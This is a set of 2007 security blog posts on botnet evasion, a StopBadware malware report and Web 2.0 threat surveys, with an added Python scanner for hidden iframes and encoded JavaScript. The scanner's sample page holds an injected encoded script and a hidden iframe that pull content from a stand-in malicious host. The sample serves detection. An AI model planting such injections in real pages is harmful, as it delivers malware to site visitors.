It's nice to have leading-edge products for every aspect of security, but it's not practical for anyone but the largest companies who can afford the technologies and the people necessary to do all the integration and management, said the analyst. Endpoint security is one area where there are already opportunities to consolidate security tools, he said.
"The emerging security platforms that pull multiple types of functions into a single product are the biggest area of cost savings we've researched," MacDonald said. "If an organization is using multiple products to defend different types of applications, or the endpoint, they need to centralize and take a closer look at some of the converged products, including those that address security from the operational side."
-Employ internal applications security testing tools during the development process.
With development giants IBM and HP snapping-up apps security specialists Watchfire and SPI Dynamics, respectively, to add testing to their platforms, it will soon become easier for developers to build security testing into their work.
No matter what tools you choose, MacDonald said that making sure applications have as few code vulnerabilities as possible before they go live can equate to significant savings on the money that would otherwise be spent protecting them after the fact.
"This idea seems like a no-brainer, but it's harder in reality because it involves a cultural change in terms of who runs the security tools and who tests the applications," he said. "However, pushing more testing into the development process itself can make a huge difference in the long run. With the acquisitions by HP and IBM, I think there's also some hope for making the transition easier by building the tools right into the development platforms."
Posted by Matt Hines on October 4, 2007 10:04 AM
October 03, 2007 | Comments: (0)
Botnet herders tending smaller flocks
For the last year or so, security researchers have been highlighting new techniques being used by botnet schemers to evade detection by anti-virus systems, law enforcement officials and network operators.
Among the most popular tactics that botnet herders have adopted to this end are P2P exploits that propagate themselves and any content they are being used to distribute without the use of traditional command and control centers.
As a whole, savvy botnet herders have also begun to utilize their networks in a far more discreet manner, keeping their zombie PCs lit up for smaller amounts of time and using larger numbers of infected machines to distribute smaller amounts of malware and spam.
Now comes word from researchers at Finjan that botnet keepers are also using smaller networks to help evade the prying eyes of security teams, IT departments, ISPs and other carriers.
As part of this effort, F-Secure contends that botnet operators are also splitting their networks into smaller groups to create "multi-swarm attacks" that are harder for any trackers to follow.
"By escaping detection in this way, criminals can effectively fly their rented botnets in under the security radar, and ensure the swarm hits the relevant Web sites with devastating results," Yuval Ben-Itzhak, CTO at Finjan, said in a research report.
"This is a potentially serious evolution in the world of botnets," he said. "The change in the Web security field has proven to be a difficult task to tackle for traditional security companies. The best way to detect modern malicious code is to be able to understand in real-time what the code intends to do, before it does."
Finjan claims that botnet operators are also increasingly using malware toolkits to build new types of Trojans to deliver their zombie code.
"Our latest [research] exposes numerous new attack vectors that raise the number of Trojan infections that create botnets," said Ben-Itzhak. "The focus has now moved on to the crimeware toolkits that generate the infections more easily and with greater force. The resultant botnet swarm potential from such infections is significant."
In the most recent iteration of its twice-yearly Internet Security Threat Report, Symantec reported that botnets have also taken on an increasingly regional flavor, with Chinese users in particular being assailed by the threats on a far more frequent basis.
Symantec reported in September that China had 29 percent of all the world's bot-infected computers over the first six months of 2007, more than any other country, and said that Beijing was the city with the most infected computers, accounting for seven percent of the worldwide total.
Posted by Matt Hines on October 3, 2007 10:01 AM
October 02, 2007 | Comments: (0)
Stopbadware forwards malware trends, tips
Stopbadware.org, the malware and adware tracking research project -- backed by Google (among others) and run out of Harvard Law School's Berkman Center for the Internet and Society -- has published a new report charting many of the trends it has seen emerging in recent months.
And while the paper (PDF) is fairly rudimentary for anyone closely following the malware and adware industries on a daily basis (like me), there are a lot of interesting factoids laced throughout the (well-written and very readable) 12-page report.
For business managers, CEOs and those less familiar with such IT security topics, the paper provides a comprehensive overview of many of the tactics currently being employed by hackers and authors of badware (any application that either tries to hide itself or any of its intentions, based on the parameters of the effort).
Some high points follow.
"Malicious hackers are attracted to the areas where easily exploitable vulnerabilities are most commonly found. These vulnerabilities are frequently concentrated on the tightly-packed shared hosting servers commonly used by small Web sites. The tide may slowly be turning, however. More mid-tier hosting providers are becoming aware of the new hacking risks to their customers, and are updating their server software or security permissions systems to help protect the sites they host. Many of the Web site owners StopBadware has spoken with have expressed a willingness to pay a little more in hosting costs for the peace of mind of knowing their site is safer."
On site attack methods:
"Two types of attack emerged as by far the most popular over the first half of 2007. These are the use of iframes to load malicious pages in frames inside otherwise benign pages, and the use of javascript browser exploits. Hidden iframes are most commonly inserted at the very top or the very bottom of a Web page's source code. When used to distribute badware, javascript is often encoded or encrypted to make its malicious nature difficult to detect. Encoded or encrypted code appears as unintelligible text, symbols and numbers."
On adware networks:
"Many providers of ads and other remotely hosted content take steps to ensure their products are safe. If you're a Web site owner considering using third party content, carefully research providers before placing their content on your site. Often other Internet users and Webmasters will have information about problematic ad networks and other third party offerings. Choosing to use third party content means inviting someone else to have control over part of your Web site, and entrusting them with the security of the content they send to your site. Choose carefully, and stay vigilant, to help keep your site secure."
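The two injection patterns named in the "site attack methods" excerpt above (hidden iframes planted at the top or bottom of a page's source, and encoded JavaScript) are easy to check for in a site's own source. The scanner below is an added example, not StopBadware's tooling; the sample page, the example.test hostnames and the flagging thresholds are constructed, and a production scanner would use a real HTML parser rather than these regexes.

```python
"""Flag hidden iframes and encoded/obfuscated script blocks in page source.
Added example; sample page, hostnames and thresholds are constructed."""
import re

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# CSS that hides a frame outright or pushes it off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d", re.I)
PERCENT_ESCAPE = re.compile(r"%[0-9a-fA-F]{2}")
# Constructs that packed payloads use to rebuild markup or code at runtime.
OBFUSCATION_MARKERS = ("unescape(", "eval(", "String.fromCharCode",
                       "document.write(unescape")
PERCENT_THRESHOLD = 8   # constructed: escapes per script before flagging
LONG_TOKEN = 200        # constructed: one unbroken token this long is suspicious


def _attrs(raw):
    """Attribute string of one tag -> lowercase-keyed dict of values."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}


def _dim(value):
    """Numeric part of a width/height attribute, or -1 if absent."""
    digits = re.sub(r"[^0-9]", "", value)
    return int(digits) if digits else -1


def _region(start, end, total):
    """Top, middle or bottom of the source (injected iframes cluster at the ends)."""
    if start < total * 0.2:
        return "top"
    if end > total * 0.8:
        return "bottom"
    return "middle"


def iframe_is_hidden(attrs):
    """True for zero/one-pixel frames or frames hidden or moved off-screen by CSS."""
    tiny = (0 <= _dim(attrs.get("width", "")) <= 1
            and 0 <= _dim(attrs.get("height", "")) <= 1)
    return tiny or bool(HIDDEN_STYLE.search(attrs.get("style", "")))


def script_reasons(source):
    """Why a script block looks encoded or packed; empty list if it looks plain."""
    reasons = [f"uses {m}" for m in OBFUSCATION_MARKERS if m in source]
    escapes = len(PERCENT_ESCAPE.findall(source))
    if escapes >= PERCENT_THRESHOLD:
        reasons.append(f"{escapes} percent-escaped bytes")
    if any(len(tok) >= LONG_TOKEN for tok in source.split()):
        reasons.append(f"unbroken token longer than {LONG_TOKEN} chars")
    return reasons


def scan_page(html):
    """Findings for hidden iframes and obfuscated scripts, in source order."""
    total, findings = len(html), []
    for m in IFRAME_RE.finditer(html):
        attrs = _attrs(m.group(1))
        if iframe_is_hidden(attrs):
            findings.append({"kind": "hidden_iframe", "offset": m.start(),
                             "region": _region(m.start(), m.end(), total),
                             "src": attrs.get("src", "")})
    for m in SCRIPT_RE.finditer(html):
        reasons = script_reasons(m.group(1))
        if reasons:
            findings.append({"kind": "obfuscated_script",
                             "offset": m.start(), "reasons": reasons})
    return sorted(findings, key=lambda f: f["offset"])


# Constructed sample: a benign embed and a plain script, followed by an
# injected encoded script and a zero-size hidden iframe at the bottom.
SAMPLE_PAGE = """<html><head><title>Harmless page</title>
<script>function greet(){ document.title = 'Hello'; }</script>
</head><body>
<h1>Welcome</h1>
<iframe src="https://video.example.test/embed/123" width="560" height="315"></iframe>
<p>Lots of ordinary content here.</p>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fbad.example.test%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
<iframe src="http://bad.example.test/drop.html" width="0" height="0" style="display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```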
On themed attacks:
"These attacks aren't confined to holidays and other calendar events. Another reason for a sudden jump in the number of visitors to a site is a link to that site from a prominent source such as a popular blog or news site. In one incident, a site that was linked to from the popular blog BoingBoing was then compromised, a maneuver colloquially known as 'link jacking.' While BoingBoing edited its post as soon as the attack was discovered, the link drew a huge amount of traffic to the compromised site, leading to an unknown number of badware infections."
On zero day threats:
"Exploits can be created quite rapidly, much quicker than software companies can get the word out to all their users about an important new security patch. Many small Web site owners are not aware of the urgency and importance of updating Web content management software they use, and allow their sites to go months, even years, without updated software."
On serial key generators:
"Using key generators is a little like playing roulette. They can install keyloggers that will record every keystroke you type on your machine and send your passwords and personal information to third parties. Again, having up to date protection may not keep you from becoming infected."
On porn codecs:
"Web sites that contain pornographic material may instruct you to download a plug-in codec to watch online videos. These can be false codecs that open up your computer's system to harmful software. Fake video codec sites often center on pornography, but these tactics could easily be used by any type of Web site."
On networking sites:
"Many features of social networking sites create easy opportunities for unscrupulous individuals to attempt to exploit your trust. Badware on these sites can be delivered through advertising, global and private messages and other means. A favorite method used by badware distributors is sending messages and 'friend invites' from fake profiles."
All in all it's a very detailed report and I'd recommend it to anyone who is trying to help educate a user community about all the security issues they need to consider in their daily travels around the Web.
Posted by Matt Hines on October 2, 2007 02:35 PM
October 01, 2007 | Comments: (0)
Web 2.0 security concerns abound
A lack of comprehensive security tools designed to stop Web-based threats continues to be a problem among businesses, according to a new survey published by Forrester Research and Secure Computing on Monday.
According to the study -- which was based on interviews conducted by Forrester with roughly 150 IT pros -- companies of all sizes continue to adopt a larger number of Web-based applications, in particular so-called Web 2.0 technologies such as online collaboration and file-sharing tools, yet few have done anything to protect themselves against the growing volume of attacks that seek to piggyback on the systems.
First off, even though most companies (97 percent) consider themselves prepared for malware threats, a majority (79 percent) admit that they are still falling prey to attacks on a "frequent basis," with a relatively large number (68 percent) conceding that they have "room for improvement."
Meanwhile, despite the fact that 96 percent of the organizations questioned said that they see a significant value in adopting Web 2.0 applications, less than 5 percent reported that they have taken any specific security measures to help protect users of the technologies -- many of which are controlled by third parties, such as Facebook or YouTube.
At the same time, companies clearly recognize the potential for Web 2.0 applications to become channels through which they might have sensitive or valuable data walk out the proverbial door. Roughly 92 percent of the respondents said that outbound data leakage prevention (DLP) is a part of their Web-filtering strategy, with 58 percent ranking it as an "extremely important" business concern.
In terms of aligning their defenses, companies seem less responsive. Forrester said that "most" enterprises are still dependent on security tools designed to keep traditional attacks at bay, while few have made the move to begin defending against newer threats.
Looking at related spending, the report finds that 46 percent of those interviewed said that malware remediation cost them over $25,000 in the last fiscal year.
Overall, only 33 percent of those interviewed for the study said that they have data leakage prevention capabilities in place today, while 57 percent of those surveyed indicated a belief that restricting access to social networking and rich media sites could "visibly increase" employee productivity.
So, it would seem that everyone agrees that user-driven technologies are very valuable in some way, yet few are doing anything to protect themselves against their use. Forrester said that this trend shows a "noticeable discrepancy" between how well prepared businesses perceive themselves to be, and how vulnerable they may really be.
"We have found that most companies that have implemented any kind of Web protection have only installed URL filtering and signature scanning," Chenxi Wang, a Forrester researcher involved with the study said in a report summary. "Malware writers are now using the Web as a primary vehicle to propagate a plethora of new threats undeterred by traditional security means. The need for more effective Web protection has never been greater."
Among the recommendations offered to companies in the report to help close the apparent gap:
-Employ new technologies that do a better job handling Web 2.0 threats, including reputation services, blended attack protection, behavior-monitoring tools, outbound content control systems and applications-usage controls.
-Re-examine security policies to account for new threats and employ additional training measures to get the word out on the attacks.
"Companies really need to adjust their policies for the Web 2.0 world in general; Internet use policies should include social Web sites, blogs, and the other varieties, and this has to be spelled out specifically," said Paul Henry, Secure Computing's vice president of technology evangelism. "Beyond that, these companies simply need stronger technical safeguards; a lot are barely protecting against the initial generations of Web-based threats that we've seen."
Posted by Matt Hines on October 1, 2007 10:11 AM